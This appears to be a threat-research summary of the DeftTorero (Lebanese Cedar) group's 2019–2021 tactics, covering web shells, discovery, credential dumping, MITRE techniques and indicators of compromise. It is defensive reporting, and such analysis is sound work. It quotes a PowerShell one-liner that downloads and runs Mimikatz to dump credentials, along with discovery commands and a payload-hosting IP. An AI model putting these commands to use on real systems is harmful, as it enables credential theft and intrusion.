Threat Research

DeftTorero TTPs in 2019–2021

Securonix

DeftTorero (Lebanese Cedar/Volatile Cedar) activity from late 2019 to mid-2021 shows a shift toward fileless/LOLBIN techniques and the use of public/offensive tooling to blend in with normal activity. The report details initial access via web shells (Caterpillar, ASPXSpy), discovery steps, credential dumping, and execution methods across Middle East victims hosting multi-site web servers. #DeftTorero #LebaneseCedar #VolatileCedar #ExplosiveRAT #Caterpillar #ASPXSpy #Lazagne #Mimikatz #Empire #Meterpreter #Nmap #AdvancedPortScanner #MiddleEast #Egypt #Jordan #Kuwait #Lebanon #SaudiArabia #Turkey #UAE

Keypoints

  • DeftTorero shows a potential shift toward fileless/LOLBIN techniques and publicly available tools to blend in with other activity.
  • Initial access is achieved via webshell deployment (Caterpillar, ASPXSpy) after exploiting web vulnerabilities or server access paths, sometimes using remote login credentials.
  • Once web shells are in place, operators perform extensive discovery to assess privileges, domains, websites, and relationships to plan credential access.
  • Credential dumping uses Lazagne and Mimikatz variants, with occasional LSASS dumping to disk and base64-encoded PowerShell one-liners from GitHub.
  • Pivoting and additional access often rely on RDP (MSTSC.exe) and later presence on other networked servers, sometimes with webshells on multiple hosts.
  • Execution and defense evasion include LOLBIN-based commands (regsvr32, MSIEXEC, PowerShell) and other techniques to bypass AV, alongside Explosive RAT modifications to evade detection.
  • Victims are predominantly in Middle Eastern countries across several sectors, with compromised web servers hosting multiple websites.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used to gain initial access by exploiting a file upload form and/or a command injection vulnerability in a functional or staging website (‘…exploited a file upload form and/or a command injection vulnerability in a functional or staging website…’).
  • [T1505.003] Web Shell – Dropped web shells (Caterpillar, ASPXSpy) on the web server; uploaded shells often drop in the same folder and may be named with a GUID (‘the uploaded webshells always drop in the same web folder, and in some cases get assigned a name containing a GUID followed by the original webshell filename’).
  • [T1105] Ingress Tool Transfer – Tools and payloads downloaded from GitHub/Internet (e.g., Mimikatz via base64-encoded PowerShell from GitHub) (‘Decoded base64 command issued through webshell to invoke Mimikatz to dump passwords’).
  • [T1059.001] PowerShell – Used to download and execute scripts (e.g., Invoke-Mimikatz.ps1) (‘IEX (New-Object System.Net.WebClient).DownloadString(…); Invoke-Mimikatz -DumpCreds;’).
  • [T1059.003] Windows Command Shell – Extensive use of cmd.exe commands for discovery and execution (‘cmd.exe /c whoami’, ‘cmd.exe /c ipconfig -all’, etc.).
  • [T1021.001] Remote Services – Pivoting via Remote Desktop Protocol (MSTSC.exe) to deploy web shells or access other systems (‘logged in using a remote desktop (MSTSC.exe) to deploy the webshell’).
  • [T1003] Credential Dumping – Dumping credentials with Lazagne/Mimikatz; LSASS dumped to disk in some cases (‘Invoke-Mimikatz -DumpCreds’, ‘LSASS.exe to disk’).
  • [T1036] Masquerading – Defense evasion by changing function names in binaries (e.g., DLL export table: AllDataGet, HistoryGetIE, TOCN, etc.) and altering user-agent strings (‘New function names compared to old ones’, ‘User Agent for HTTP Communication’).

Indicators of Compromise

  • [IP Address] 200.159.87.196 – Used as a host for downloading payloads and for C2-related activity (e.g., av.vbs, 1.msi, made.ps1).
  • [Domains] githubusercontent.com, raw.githubusercontent.com – Used to host and fetch credential tools and PowerShell scripts (e.g., Invoke-Mimikatz.ps1, Invoke-mimikittenz.ps1).
  • [File Name] Caterpillar, ASPXSpy – Webshell file names deployed on compromised web servers.
  • [File Name] 1.msi – MSI package referenced in command lines for installation on remote hosts.

Read more: https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/